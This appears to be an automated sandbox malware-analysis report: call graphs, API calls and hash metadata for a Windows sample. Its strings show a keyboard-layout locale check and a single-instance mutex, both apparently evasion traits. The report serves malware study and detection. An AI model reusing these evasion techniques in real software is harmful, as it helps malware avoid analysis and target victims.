12187->12201 12192 eca953 Sleep CreateMutexA 12189->12192 12191 eca8ae 12191->12188 12194 ec7d30 7 API calls 12191->12194 12193 eca98e 12192->12193 12195 eca8b8 12194->12195 12195->12188 12196 ec7d30 7 API calls 12195->12196 12197 eca8c2 12196->12197 12197->12188 12198 ec7d30 7 API calls 12197->12198 12199 eca8cc 12198->12199 12199->12188 12200 ec7d30 7 API calls 12199->12200 12200->12188 12202 ec7d96 __cftof 12201->12202 12239 ec7ee8 shared_ptr std::invalid_argument::invalid_argument 12202->12239 12240 ec5c10 12202->12240 12204 ec7dd2 12205 ec5c10 6 API calls 12204->12205 12207 ec7dff shared_ptr 12205->12207 12206 ec7ed3 GetNativeSystemInfo 12208 ec7ed7 12206->12208 12207->12206 12207->12208 12207->12239 12209 ec7f3f 12208->12209 12210 ec8019 12208->12210 12208->12239 12211 ec5c10 6 API calls 12209->12211 12212 ec5c10 6 API calls 12210->12212 12213 ec7f67 12211->12213 12214 ec804c 12212->12214 12215 ec5c10 6 API calls 12213->12215 12216 ec5c10 6 API calls 12214->12216 12217 ec7f86 12215->12217 12218 ec806b 12216->12218 12250 ef8bbe 12217->12250 12220 ec5c10 6 API calls 12218->12220 12221 ec80a3 12220->12221 12222 ec5c10 6 API calls 12221->12222 12223 ec80f4 12222->12223 12224 ec5c10 6 API calls 12223->12224 12225 ec8113 12224->12225 12226 ec5c10 6 API calls 12225->12226 12227 ec814b 12226->12227 12228 ec5c10 6 API calls 12227->12228 12229 ec819c 12228->12229 12230 ec5c10 6 API calls 12229->12230 12231 ec81bb 12230->12231 12232 ec5c10 6 API calls 12231->12232 12233 ec81f3 12232->12233 12234 ec5c10 6 API calls 12233->12234 12235 ec8244 12234->12235 12236 ec5c10 6 API calls 12235->12236 12237 ec8263 12236->12237 12238 ec5c10 6 API calls 12237->12238 12238->12239 12239->12191 12241 ec5c54 12240->12241 12253 ec4b30 12241->12253 12243 ec5d17 shared_ptr std::invalid_argument::invalid_argument 12243->12204 12244 ec5c7b __cftof 12244->12243 12245 ec5da7 RegOpenKeyExA 12244->12245 12246 ec5e00 RegCloseKey 12245->12246 12248 ec5e26 12246->12248 12247 ec5ea6 shared_ptr std::invalid_argument::invalid_argument 12247->12204 12248->12247 12249 ec5c10 4 API calls 12248->12249 12374 ef8868 12250->12374 12252 ef8bdc 12252->12239 12255 ec4ce5 12253->12255 12256 ec4b92 12253->12256 12255->12244 12256->12255 12257 ef6da6 12256->12257 12258 ef6db4 12257->12258 12259 ef6dc2 __fassign 12257->12259 12262 ef6d19 12258->12262 12259->12256 12267 ef690a 12262->12267 12266 ef6d3d 12266->12256 12268 ef6921 12267->12268 12269 ef692a 12267->12269 12275 ef6d52 12268->12275 12269->12268 12281 efa671 12269->12281 12276 ef6d8f 12275->12276 12277 ef6d5f 12275->12277 12366 efb67d 12276->12366 12280 ef6d6e __fassign 12277->12280 12361 efb6a1 12277->12361 12280->12266 12282 efa67b __cftof 12281->12282 12284 efa694 __cftof __freea 12282->12284 12296 efd82f 12282->12296 12285 ef694a 12284->12285 12300 ef8bec 12284->12300 12288 efb5fb 12285->12288 12289 efb60e 12288->12289 12291 ef6960 12288->12291 12289->12291 12326 eff5ab 12289->12326 12292 efb628 12291->12292 12293 efb63b 12292->12293 12294 efb650 12292->12294 12293->12294 12333 efe6b1 12293->12333 12294->12268 12297 efd83c __cftof 12296->12297 12298 efd87a 12297->12298 12299 efd867 RtlAllocateHeap 12297->12299 12298->12284 12299->12297 12299->12298 12301 ef8bf1 __cftof 12300->12301 12304 ef8bfc __cftof 12301->12304 12306 efd634 12301->12306 12320 ef65ed 12304->12320 12308 efd640 __cftof 12306->12308 12307 efd69c ___std_exception_copy 12307->12304 12308->12307 12309 efd81b __cftof 12308->12309 12310 efd726 12308->12310 12311 efd751 __cftof 12308->12311 12312 ef65ed __cftof 3 API calls 12309->12312 12310->12311 12323 efd62b 12310->12323 12311->12307 12315 efa671 __cftof 4 API calls 12311->12315 12318 efd7a5 12311->12318 12313 efd82e 12312->12313 12315->12318 12317 efd62b __cftof 4 API calls 12317->12311 12318->12307 12319 efa671 __cftof 4 API calls 12318->12319 12319->12307 12321 ef64c7 __cftof 3 API calls 12320->12321 12322 ef65fe 12321->12322 12324 efa671 __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 12323->12324 12325 efd630 12324->12325 12325->12317 12327 eff5b7 __cftof 12326->12327 12328 efa671 __cftof 4 API calls 12327->12328 12330 eff5c0 __cftof 12328->12330 12329 eff606 12329->12291 12330->12329 12331 ef8bec __cftof 4 API calls 12330->12331 12332 eff62b 12331->12332 12334 efa671 __cftof 4 API calls 12333->12334 12335 efe6bb 12334->12335 12338 efe5c9 12335->12338 12337 efe6c1 12337->12294 12339 efe5d5 __cftof __freea 12338->12339 12340 efe5f6 12339->12340 12341 ef8bec __cftof 4 API calls 12339->12341 12340->12337 12342 efe668 12341->12342 12346 efe6a4 12342->12346 12347 efa72e 12342->12347 12346->12337 12348 efa739 __cftof 12347->12348 12349 efd82f __cftof RtlAllocateHeap 12348->12349 12353 efa745 __cftof __freea 12348->12353 12349->12353 12350 ef8bec __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 12351 efa7c7 12350->12351 12352 efa7be 12354 efe4b0 12352->12354 12353->12350 12353->12352 12355 efe5c9 __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 12354->12355 12356 efe4c3 12355->12356 12357 efe259 __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 12356->12357 12358 efe4cb __cftof 12357->12358 12359 efe6c4 __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 12358->12359 12360 efe4dc __cftof __freea 12358->12360 12359->12360 12360->12346 12362 ef690a __cftof 4 API calls 12361->12362 12363 efb6be 12362->12363 12365 efb6ce std::invalid_argument::invalid_argument 12363->12365 12371 eff1bf 12363->12371 12365->12280 12367 efa671 __cftof 4 API calls 12366->12367 12368 efb688 12367->12368 12369 efb5fb __cftof 4 API calls 12368->12369 12370 efb698 12369->12370 12370->12280 12372 ef690a __cftof 4 API calls 12371->12372 12373 eff1df __cftof __fassign __freea std::invalid_argument::invalid_argument 12372->12373 12373->12365 12375 ef887a 12374->12375 12376 ef690a __cftof 4 API calls 12375->12376 12379 ef888f ___std_exception_copy 12375->12379 12378 ef88bf 12376->12378 12377 ef6d52 4 API calls 12377->12378 12378->12377 12378->12379 12379->12252 12727 edd111 12730 edd122 12727->12730 12728 edd12a 12730->12728 12731 edd199 12730->12731 12732 edd1a7 SleepConditionVariableCS 12731->12732 12733 edd1c0 12731->12733 12732->12733 12733->12730 12998 ec2b90 12999 ec2bce 12998->12999 13000 edb7fb TpReleaseWork 12999->13000 13001 ec2bdb shared_ptr std::invalid_argument::invalid_argument 13000->13001 13143 ec2b10 13144 ec2b1c 13143->13144 13145 ec2b1a 13143->13145 13146 edc26a 5 API calls 13144->13146 13147 ec2b22 13146->13147 12837 ed87d0 12838 ed882a __cftof 12837->12838 12844 ed9bb0 12838->12844 12842 ed88d9 std::_Throw_future_error 12843 ed886c std::invalid_argument::invalid_argument 12857 ed9ef0 12844->12857 12846 ed9be5 12847 ec2ce0 5 API calls 12846->12847 12848 ed9c16 12847->12848 12861 ed9f70 12848->12861 12850 ed8854 12850->12843 12851 ec43f0 12850->12851 12852 edbedf InitOnceExecuteOnce 12851->12852 12853 ec440a 12852->12853 12854 ec4411 12853->12854 12855 ef6cbb 4 API calls 12853->12855 12854->12842 12856 ec4424 12855->12856 12858 ed9f0c 12857->12858 12859 edc68b __Mtx_init_in_situ 2 API calls 12858->12859 12860 ed9f17 12859->12860 12860->12846 12862 ed9fef shared_ptr 12861->12862 12864 eda058 12862->12864 12866 eda210 12862->12866 12865 eda03b 12865->12850 12867 eda290 12866->12867 12873 ed71d0 12867->12873 12869 eda2cc shared_ptr 12870 eda4be shared_ptr 12869->12870 12871 ec3ee0 3 API calls 12869->12871 12870->12865 12872 eda4a6 12871->12872 12872->12865 12874 ed7211 12873->12874 12881 ec3970 12874->12881 12876 ed7446 std::invalid_argument::invalid_argument 12876->12869 12877 ed72ad __cftof 12877->12876 12878 edc68b __Mtx_init_in_situ 2 API calls 12877->12878 12879 ed7401 12878->12879 12886 ec2ec0 12879->12886 12882 edc68b __Mtx_init_in_situ 2 API calls 12881->12882 12883 ec39a7 12882->12883 12884 edc68b __Mtx_init_in_situ 2 API calls 12883->12884 12885 ec39e6 12884->12885 12885->12877 12887 ec2f06 12886->12887 12890 ec2f6f 12886->12890 12888 edc6ac GetSystemTimePreciseAsFileTime 12887->12888 12889 ec2f12 12888->12889 12892 ec301e 12889->12892 12896 ec2f1d __Mtx_unlock 12889->12896 12891 ec2fef 12890->12891 12897 edc6ac GetSystemTimePreciseAsFileTime 12890->12897 12891->12876 12893 edc26a 5 API calls 12892->12893 12894 ec3024 12893->12894 12895 edc26a 5 API calls 12894->12895 12898 ec2fb9 12895->12898 12896->12890 12896->12894 12897->12898 12899 edc26a 5 API calls 12898->12899 12900 ec2fc0 __Mtx_unlock 12898->12900 12899->12900 12901 edc26a 5 API calls 12900->12901 12902 ec2fd8 12900->12902 12901->12902 12902->12891 12903 edc26a 5 API calls 12902->12903 12904 ec303c 12903->12904 12905 edc6ac GetSystemTimePreciseAsFileTime 12904->12905 12914 ec3080 shared_ptr __Mtx_unlock 12905->12914 12906 edc26a 5 API calls 12907 ec31cb 12906->12907 12908 edc26a 5 API calls 12907->12908 12909 ec31d1 12908->12909 12910 edc26a 5 API calls 12909->12910 12916 ec3193 __Mtx_unlock 12910->12916 12911 ec31a7 std::invalid_argument::invalid_argument 12911->12876 12912 edc26a 5 API calls 12913 ec31dd 12912->12913 12914->12907 12914->12911 12915 edc6ac GetSystemTimePreciseAsFileTime 12914->12915 12917 ec315f 12914->12917 12915->12917 12916->12911 12916->12912 12917->12906 12917->12909 12917->12916

                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                Function 00EF652B Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • ExitProcess.KERNEL32(?,?,00EF652A,?,?,?,?,?,00EF7661), ref: 00EF6567
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1771332626.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1771315072.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771332626.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771389931.0000000000F29000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771405767.0000000000F2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771424131.0000000000F37000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771530382.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771548808.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771570054.00000000010AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771586419.00000000010AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771601838.00000000010AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771601838.00000000010B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771635794.00000000010C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771651583.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771667881.00000000010CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771683261.00000000010CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771704218.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771720321.00000000010EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771737620.00000000010F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771754017.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771774087.0000000001111000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771790150.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771805211.0000000001113000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771821455.000000000111B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771838515.0000000001124000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771854943.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771872547.0000000001137000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771889671.000000000113B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771905564.000000000113C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771920982.000000000113F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771937022.0000000001146000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771952031.0000000001147000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771968014.000000000114F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771982640.0000000001150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771998260.0000000001159000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772013221.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772033133.0000000001176000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772049778.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772049778.000000000119A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772091483.00000000011C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772107669.00000000011C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772122219.00000000011C8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772137754.00000000011CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772152322.00000000011CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772168688.00000000011DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772183931.00000000011DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ExitProcess
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 621844428-0
                                                                                                                                                                                                • Opcode ID: 6d3aaf9cf6c34ef47a28dbbe159e4842afad02c2760b2ca78b8ee480d611fb31
                                                                                                                                                                                                • Instruction ID: 0844eee855f2da65465aa960e7e7d2ad5a7a094bc469a20c3723619273eaa886
                                                                                                                                                                                                • Opcode Fuzzy Hash: 6d3aaf9cf6c34ef47a28dbbe159e4842afad02c2760b2ca78b8ee480d611fb31
                                                                                                                                                                                                • Instruction Fuzzy Hash: BBE0863014264CAFCF35BB58C81DD683B5AEF5175DF045C14FA28A6121CB25ED41CD80
                                                                                                                                                                                                Function 05660C36 Relevance: .1, Instructions: 76COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1773604194.0000000005660000.00000040.00001000.00020000.00000000.sdmp, Offset: 05660000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_5660000_file.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 32888de9aa0232fcd5f9e501adcfccd66219136a5815bc3d7ca2769bf7a12eb8
                                                                                                                                                                                                • Instruction ID: 1d52f97c1770d2f6aac5809d3fbf56fca34bb44f9d1a9e93dfc8fe6f4ae7ca89
                                                                                                                                                                                                • Opcode Fuzzy Hash: 32888de9aa0232fcd5f9e501adcfccd66219136a5815bc3d7ca2769bf7a12eb8
                                                                                                                                                                                                • Instruction Fuzzy Hash: BB01FBFB10D110BD7151D5467B28AFB67AED5C57703308837F847C6541D2A84E8BA232
                                                                                                                                                                                                Function 00EC5C10 Relevance: 12.7, APIs: 2, Strings: 5, Instructions: 434COMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1771332626.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1771315072.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771332626.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771389931.0000000000F29000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771405767.0000000000F2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771424131.0000000000F37000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771530382.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771548808.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771570054.00000000010AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771586419.00000000010AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771601838.00000000010AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771601838.00000000010B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771635794.00000000010C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771651583.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771667881.00000000010CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771683261.00000000010CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771704218.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771720321.00000000010EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771737620.00000000010F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771754017.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771774087.0000000001111000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771790150.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771805211.0000000001113000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771821455.000000000111B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771838515.0000000001124000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771854943.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771872547.0000000001137000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771889671.000000000113B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771905564.000000000113C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771920982.000000000113F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771937022.0000000001146000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771952031.0000000001147000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771968014.000000000114F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771982640.0000000001150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771998260.0000000001159000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772013221.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772033133.0000000001176000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772049778.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772049778.000000000119A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772091483.00000000011C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772107669.00000000011C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772122219.00000000011C8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772137754.00000000011CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772152322.00000000011CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772168688.00000000011DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772183931.00000000011DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                                                                                                                                                                                                • API String ID: 0-3963862150
                                                                                                                                                                                                • Opcode ID: 4791af61148f99e896e615fcd15b07e08730e095d2e2d677c65177a97282fe17
                                                                                                                                                                                                • Instruction ID: d2111e0c474c3624e48d1807cb00a2e83a133ba652edadcab91e2e53cd11b8e8
                                                                                                                                                                                                • Opcode Fuzzy Hash: 4791af61148f99e896e615fcd15b07e08730e095d2e2d677c65177a97282fe17
                                                                                                                                                                                                • Instruction Fuzzy Hash: B5F1F171A0024CAFEB24DF14CD84BDEBBB9EB44304F5046ADF508A7281DB75AA85CF95
                                                                                                                                                                                                Function 00EC9BA5 Relevance: 3.1, APIs: 2, Instructions: 140sleepsynchronizationCOMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 185 ec9ba5-ec9d91 call ed7a00 call ec5c10 call ec8b30 call ed8220
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 00ECA963
                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,00F23254), ref: 00ECA981
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1771332626.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1771315072.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771332626.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771389931.0000000000F29000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771405767.0000000000F2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771424131.0000000000F37000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771530382.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771548808.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771570054.00000000010AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771586419.00000000010AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771601838.00000000010AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771601838.00000000010B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771635794.00000000010C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771651583.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771667881.00000000010CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771683261.00000000010CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771704218.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771720321.00000000010EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771737620.00000000010F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771754017.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771774087.0000000001111000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771790150.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771805211.0000000001113000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771821455.000000000111B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771838515.0000000001124000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771854943.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771872547.0000000001137000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771889671.000000000113B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771905564.000000000113C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771920982.000000000113F000.00000040.00000001.01000000.00000003.sdmpDownload File
